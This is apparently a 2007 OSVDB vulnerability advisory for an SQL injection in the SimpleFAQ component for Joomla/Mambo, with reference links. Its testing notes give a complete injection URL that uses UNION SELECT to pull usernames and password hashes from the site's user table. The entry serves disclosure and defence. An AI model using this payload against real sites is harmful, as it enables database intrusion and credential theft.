SimpleFAQ Component for Joomla! index.php aid Variable SQL Injection

2007-08-20T00:00:00
ID OSVDB:37174
Type osvdb
Reporter OSVDB
Modified 2007-08-20T00:00:00

Description

Manual Testing Notes

http://[target]/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1//union//select//0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from/*/mos_users/

References:

Vendor URL: http://www.parkviewconsultants.com/content/view/19/47/ Secunia Advisory ID:26556 Mail List Post: http://www.securityfocus.com/archive/1/archive/1/477232/100/0/threaded ISS X-Force ID: 36113 Generic Exploit URL: http://www.milw0rm.com/exploits/4296 CVE-2007-4456